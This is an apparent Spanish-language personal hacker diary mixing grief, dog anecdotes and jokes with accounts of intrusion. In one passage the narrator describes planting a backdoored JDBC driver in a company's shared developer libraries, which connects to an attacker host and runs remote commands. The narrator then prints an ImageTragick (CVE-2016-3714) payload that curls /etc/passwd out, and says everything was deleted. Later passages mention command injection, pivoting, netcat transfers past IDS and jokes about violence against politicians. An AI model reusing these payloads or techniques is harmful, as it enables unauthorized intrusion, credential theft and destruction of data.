Después de varías horas de crasheos y de sentir mi computadora hervir, al fin, tenía una captura. Eran apenas unos megabytes, pero era suficiente para darme esperanza, el trabajo arduo, el sudor, el estrés, la tensión… todo se resumía a este pcap:
Al verlo, revisé paquete por paquete… ¡oh-oh!… no había nada. Plop.
Querido Diario…
“Au[…]to… tienes un serio problema, nunca te enseñaron a decir: ya no puedo más”… mi panza gruñía por el hambre, y; a pesar de los meses, mis manos estaban cortadas por las finas láminas de metal. Después de mentir y hacer como que pedía un taxi, le deje en su casa y caminé por una hora, a lo que llamaba “casa”. Entré y puse la jerga bajo la puerta, esperando fuese suficiente para impedir que las cucarachas entrasen, me tiré en el suelo, esperando mi piel se acostumbrase a lo caliente del suelo, me quité la playera y la hice bolita para usarla como almohada. Quería decir “ya no puedo más”, quería que dejase de doler. Quería llorar, no por el hambre, por el ardor en la piel… quería llorar porque le extrañaba.
El calor ha empezado en el desierto cachanillo… para un chilango normal, hoy ya no habría estado pasable.
- Joven, ¿recuerdas cuando me preguntaste en donde veías Hotel Transilvania?
- Si, ¿por?
- Te paso el link en español latino
- Hey tú
- Hola terrorista cibernético
- Necesito de tu ayuda
- *cerrando chat...*
- ¿*cerrando...*?, creo que has pasado demasiado tiempo conmigo
- Hum... ¿qué sucede?
- ¿Me puedes prestar tu PBOX?
- ¿Pediras algo ilegal? - ¿por qué yo pediría algo ilegal?
- No, es algo para una investigación que estoy haciendo
- ¿Ilegal? - ya nadie confía en mi
- No
- ¿Qué es?
- Hum... se ve ilegal... y turbio
Mi paquete de vuelta apenas llegó a China, y dicen que mañana me enviarán uno nuevo, o “a few”; para poder seguir con el research.
Querido Diario.. he caído en cuenta, que los vinos del Valle de Napa con muy, muy dulces… de los tres viñedos que conozco, creo que mis favoritos son de allí; aunque obviamente sigo prefiriendo los vinos de Mendoza, Ahora que en San Francisco, Federico, me ha invitado a Argentina; creo que le tomaré la palabra, enviaré algo de lo que estoy haciendo y esperaré me reciba con unos Trabuches 😛 … que vaya que en San Francisco la pasamos bien con los rusos. ¿Quién iba a pensar que nos íbamos a encontrar después de tantos años allí?
A pesar de que tengo una máquina virtual en donde dice que tengo instalado Windows de 64 bits; al sólo tener un microprocesador Genymotion lo detectó como de 32 bits, evitando ejecutar un Android cargado en un Samsung S9. Y hasta que no agregué un segundo procesador a la máquina virtual fue que ejecutó la máquina virtual de Genymotion… oh si, virtualización sobre virtualización 😛 RAM a toda prueba, y luego hay quienes dicen que las Macbook no son pro 😛 … I Apple.
Pero bueno… después de que ya está todo corriendo, coff.. coff.. ¿cómo se le hace para usar un Android? jajaja 😛 no es que sea payaso, pero… no tengo ni idea de que botón apretar 😛
También tengo otro problema (oh si, ya había olvidado que en el researching todo el tiempo uno se la pasa en problemas), el “dispositivo” no carga. Venía con media carga de fábrica, y el domingo le usé y quedó como a mitad de carga, pero ahora que lo conecto, no veo que cargue, ya lo hice a la electricidad y a la computadora por un puerto USB y nada.. hum… vaya a ser que como es patrocinador está defectuoso D:
H0y fuimos a comer para despedirnos, si los países se encuentran en posición, las estrellas se alinean y los sacrificios son escuchados; tal vez hoy fue su último día en Mexicali… en México.
- ¿Y ahora qué será de ti?, te va a parar la policía, vas a chocar, te van a mal influenciar... - dijo de forma bastante seria
- Si... de hecho, necesito una conciencia; tal vez tome una nueva. Hum... hum... hum... bueno ya pensaré en alguna. ¿Sabes?, he estado pensando
- ¿En qué? - dijo mientras le tomaba una foto a la comida y la enviaba a sus inquisidores por mensaje
- Creo que debo de hacerte caso... es el momento de cambiar, de aprovechar lo que el poderoso Quetzalcoatl me ofrece, es el momento de seguir mis sueños. - justo en ese momento recordé a Lalo y Lalo2
- ¿Ah si?, ¿qué vas a ser?, ¿dejarás la vida turbia e ilegal o regresarás a tener un empleo normal? - me miró aun escribiendo por el celular, sin imaginar lo que venía por respuesta.
- Si... me jubilo, adios la vida turbia e ilegal; voy a ir la próxima semana a despedir. Es el fin, se acabó... no más... es tiempo de tener una vida normal - se le abrieron los ojos, dejó de escribir... por suerte, no tenía té en la boca o lo hubiese escupido.
- No te creo - se rió - no, no... me intentas, ¿cómo dices?, ¿chamaquear?
- No, lo digo en serio... es tiempo de mirar al futuro, de hacer cambios, cambios importantes.
- ¿Qué harás?, ¿por qué ahora?... noooo.. quiero enterarme - empezó a creerlo
- Es una sorpresa, lo tengo que anunciar en grande, frente a todos; además... aunque se que me van a matar, tengo que mostrar mi agradecimiento a toda la H. Organización Turbia e Ilegal... los llevaré - me puse melancólico - siempre en mi corazón
- Pero, ¿qué harás?, ¿de qué vivirás?
- Ouuu... ya verás, tengo tantas opciones... más o menos me ofrecen un empleo por día.. creo que... tengo de donde elegir.
- Decenas... no... tal vez cientos de personas, entraran en shock con el anuncio que haré; y ya sé en donde lo hará... en el próximo NoTrustSex.. digo Sec: https://www.meetup.com/es/NoTrustSec/events/256251030/ ... hum... lástima, estarás al otro lado del mundo para enterarte
- Grrrr...
Querido Diario… va a ser un notición… ¿qué será lo que tengo que decir?, bueno… hay que esperar una semana para saberlo… les espero en el NoTrustSec de la Ciudad de México, en donde contaré algo, que volverá loca a la gente 😛
Me lo pidió mucha gente.. me negué, me lo siguieron pidiendo; personas que ni conocía de Chile, amigos de Argentina, México… incluso durante la organización de otros eventos me lo pedían; hasta el viernes pasado donde en la fiesta de cumpleaños de Luis, mucha gente me insistió e insistió…
Me tomé un trago de bourbón y prometí…
Querido Diario… ¿para qué planear?, es mejor hacer las cosas sin pensar… pues bueno, espero que de tanto que me insistieron, alguien me ayudé por allí.
Iba tranquilamente manejando sobre Av. Justo Sierra, yendo hacia Baires para comer, cuando de pronto me llegó un mensaje.
Llevaba tiempo que no teníamos una misión, así que inmediatamente me coordine con el equipo para avanzar, lo más pronto posible. Marqué a la persona de mayor confianza.
- Bueno
- ¡Joven!
- ¿Qué cuenta joven?
- Pues nada, aquí con un encarguito
- ¿Qué clase de encarguito? - le cambió el tono de voz, a uno más serio
- Mom me pidió ir a dar unos tehuacanazos
- ¡Huuuuy joven!, creo que eso no se va a poder... pero dame una semana y lo vemos - y me colgó
Hum.. diablos, el elemento más turbio y confiable de esta H. Organización Turbia e Ilegal no estaba disponible; pero al menos espero me traiga un recuerdito. Entonces, le marqué a la segunda opción.
- Bueno - se escuchaba una voz grave y cansada, como de alguien que lleva varios días sin dormir
- ¡Joven!
- ¿Qué pasó?
- ¿Qué haces? - dije yo, intentando ocultar el verdadero motivo de mi llamada
- Viendo el partido
- ¿Cual partido?
- Pues el partido
- Hum.. pero ¿partido de que o qué?
- Hum... ¿de futbol? - algo me decía que no me estaba diciendo la verdad
- ¿En lunes?
- ¿No hay partido los lunes?
- Creo que no
- Ouuuu... - lo había atrapado
- Estas cuidando de la bebé, ¿cierto?
- Si joven, llevó una semana sin dormir y mis tarjetas están en negativo - dijo casi llorando
- Hum... joven, algo me dice que esto no va a funcionar. Básicamente ya no puedo mandarte a ninguna misión turbia e ilegal, me sentiría mal si esa niña se queda huérfana
- ¿Hay una misión turbia e ilegal?, ¿hay bono extra?
- Joven - me pusé serio
- ¿Si?
- Nos vemos en 18 años, joven
- Demonios... mi carrera criminal ha durado poco - y le colgué
Bueno, siempre hay una tercera opción
- Bueno
- ¿Qué tranza? - me respondió con ese barrio iztapalapense que brinda confianza en este tipo de escenarios
- ¡Janey!, ¿qué estas haciendo?
- Noviando con El Chino
- Ouu...
- ¿Necesitabas algo?
- Pozolear a un criminal
- ¿No podemos esperar para mañana? - me dijo, plenamente interesada
- No
- Ouuu.. marcarle a Lalito
- No puede
- ¿Al Becario?
- Tampoco
- Hum... seguro tú podrás resolverlo, siempre puedes. Nos vemos Belindo - y me colgó
Hum… este equipo no está resultando. Así que miré a Shellcode, me miro, nos miramos.. y determiné que yo mismo haría la misión turbia e ilegal, al final, por eso soy el lugarteniente de esta H. Organización Turbia e Ilegal, yo podía hacerlo sólo. Y me puse a trabajar en ello.
Ouu… bueno, tal vez mi única compañera no me acompañaría en la misión.
Me senté frente a la computadora, la miré fijamente… y me di cuenta que no tenía la menor idea de que hacer; así que me di cuenta que en realidad ya estoy muy viejo, y sin equipo no soy nada. Lo único que se me ocurrió es utilizar las únicas técnicas que conozco: chamaquear a alguien.
Por suerte me di cuenta de alguien que trabajaba en ese sitio y que me iba a ser de utilidad.
- ¿Y qué haces allí?
- Ahhh pues... no mucho, me encargo como de todo - eso pasa cuando se es la sobrina del dueño - ¿y tú que haces?
- Nada, aquí aburrido... vamos a comer
- Ok, pero me esperas a que terminé unas cosas
- Si, claro... salgo para allá y de allí nos vamos
Llegué a su oficina y rápidamente empecé a explorar la red. No es una empresa muy grande, así que me encontré ShareEnum que tenían directorios compartidos para varías cosas, incluyendo un “repositorio” de librerías de los programadores. Vi que hacían uso de aplicaciones en Java y las conectaban a los servidores de bases de datos haciendo uso de JDBC, así que, basándome en un paper de un researcher llamado Airman, modifiqué los el driver así:
import java.sql.*;
public class JDBCBackdoorTest {
public static void main(String[] argsStrings){
try{
Connection conn = DriverManager.getConnection("jdbc:blah://bigshot.beer:31337/");
} catch(Exception e) {
e.printStackTrace();
}
}
}
Listo, lo dejé allí y me fui a comer con Priscilla.
Más tarde al llegar a casa me di cuenta que al menos tres desarrolladores habían utilizado el driver para conectarse. Me puse los audífonos y puse la play list especial de hackeo: https://open.spotify.com/playlist/0EfZGNw0JHvoCkNfnMDYAU
¿Qué es lo que hace el driver?, bueno… simplemente ejecuta comandos en la consola, con eso obtuve acceso remoto a la red de la súper empresa segura. Mom no quería más que destruir todo, así que…
Sólo antes de borrar todo y colapsar a todos, quería probar el CVE-2016-3714:
push graphic-context
viewbox 0 0 640 480
fill 'url(localhost"|curl "`curl MyHost/i/?imagewarn --data @/etc/passwd`)'
pop graphic-context
Y…
Ya después de que deje de jugar, entonces si, borré todo…
Querido Diario…
Regresé a casa y me puse a trabajar en el primer assessment que me asignaron, a pesar de que mi profile está pensado para aplicaciones, me dieron un network security assessment 😛 no saqué nada… así que, necesitaba un poco de despejar la mente para poder seguir trabajando.
- ¿Cómo te fue? - me preguntó mientras me pasaba una tarta de pistache y ella se quedaba con la de chocolate; de las que venden en Raphael; frente al Carl's Jr
- Bien, cansado... pero creo que bien; se ven esperanzas
- ¿Qué es eso de [...]? - me preguntó, yo le había comentado en al semana que estaba muy emocionado por eso
- Es un programa privado de bug bounty.... lo de las recompensas
- Te notas muy feliz por eso
- Si - dije pensando - me gusta mucho, me hace sentir que aun sirvo para algo
- ¿No extrañas trabajar en eso?
- Si, moriría de ganas de poder hacerlo nuevamente
- ¿Y luego? - mi miró con esa mirada que tiene de "hazlo"
- Hum... mejor retirarse en la cima - evadí la pregunta
- ¿Qué sientes? - me preguntó. Perfectamente sabía a que se refería
- Duele
- ¿Qué tanto?
- Mucho... duele el pecho, duele todo... es como algo que presiona; duele no poder dar un beso, duelen los brazos al no poder abrazarle... duele no poder siquiera escuchar su risa o su voz
- Hum...
- Hey, basta.. cuéntame... ¿cómo te fue hoy?
- Hum... mejor no, ¿tienes prisa?, ¿vamos al cine?. Vamos a ver Venom, aunque no te gusten las películas de súper héroes
- Vale,... ¡vamos!, pero pediremos nachos; con muchos jalapeños y Pepsi, porque la Coca-cola, yiuck...
Nunca entenderé porque a la gente le gustan las películas de súper héroes; me parecen muy aburridas y predecibles.
- ¿Cual es tu película favorita? - me preguntó mientras íbamos de regreso al coche
- Moulin Rouge - dije
- ¿Por qué?
- Hum... no lo sé; me gusta la historia. Un tiempo le vi tanto que hasta los diálogos me aprendí
- Eres raro - dijo de pronto
- Hum... no sé como tomar eso - le respondí arremendandole
- Nos vemos terrorista cibernético; intenta dormir
- Trataré...
Me quedé fuera de la casa, en un columpió, viendo como Shellcode se peleaba con la manguera del agua… y pensando en lo que tanto me repitieron la semana pasada. Pensé y pensé… y al final recordé que… lo mejor es no planear, sino sólo actuar. Y entonces, lo decidí… lo voy a hacer.
Me acabo apenas de dar cuenta que Symantec adquirió hace muchos años LopthCrack. Poco antes liberaron su versión 7 (yo me quedé en la 6), pero jamás le dieron más continuidad, porque las regulaciones de EEUU prohibieron que pudiese ser comercializada. Y si… me he preguntando: entonces, ¿ahora como le hace el mundo para sacar hashes?, bueno… como ya no hay LC, pensé en pwdump, pero desde pwdump7 no ha habido una nueva versión. ¡Demonios!, hoy todo mundo usa Mimikatz.
¿Ah si?, ¿por qué quiero sacar unos hashes?… bueno, un command injection.
Aunque no lo creas aun se pueden encontrar estas cosas por el mundo… lo complejo de esto es que imagina un escenario con dos servidores, uno de ellos es tu objetivo, pero no está expuesto, el otro es donde está el command injection; y desde allí hay que saltar al interno… pero no tengo ninguna cosa para administrarlo, pero ya cree un usuario de dominio 😛
Lo sé, parece escenario de CTF, pero no… ya sabes como odio los CTF, esto es un coff.. coff.. banco coff.. coff.. es un buen bounty 😛 coff.. coff… ¿para qué?, bueno…
En realidad no, ya casi termina el calor… “termina”, en Mexicalli jamás termina el calor, el invierno es como un verano chilango; pero Shellcode ya pude salir sin miedo. Pero… lo que nos hemos dado cuenta es que no cabe en un coche; y eso que aun es chiquita, así que, ya sé que voy a hacer si gano el bounty.
En ese color azul-morado 😛
Pero.. primero tengo que ver como resuelvo el problema de la administración usando el usuario que cree y jumpeando desde el servidor con el command injection.
Querido Diario… aun tengo cierto atractivo en el mundo….
Aunque ya sabemos que respondí… por otra parte, Querido Diario… ¿los perros podrán ver su reflejo?, y si lo ven… ¿son capaces de saber si el reflejo son ellos o piensan que es otro perro?, los peces no pueden saber que se trata de ellos mismo. Y algo me dice que Shellcode tampoco puede saberlo; acá podemos ver a la señorita heredera de la valentía de todo labrador.
Querido Diario… creo que es momento de tomar un descanso, y terminar al fin el 10mo Doctor. Después de llorar a moco suelto por el capítulo donde el Doctor al fin logra volver a ver a Rose.
Siempre mover archivos dentro de una red es un poco truculento; y ahora con los IDS’s o las herramientas de DPL, puede ser un martirio más grande. Desde montar compartidos que puedan ser leídos desde donde sea, usar el administrador de conexión de DRP que no sé porque ese si deja, pero una conexión de terminal service normal no, y como siempre, el confiable netcat.
Con netcat podemos mover archivos con gran facilidad, con un sólo comando; aunque los IDS’s comúnmente lo detectarán.
Algunos movimientos simples que pueden servirte, no sé… por ejemplo cuando estas echo bolita dentro de un parlamento extranjero, con ganas de secuestrar a la ministra de economía; o meterlo un tiro al primer ministro… pueden ser estos:
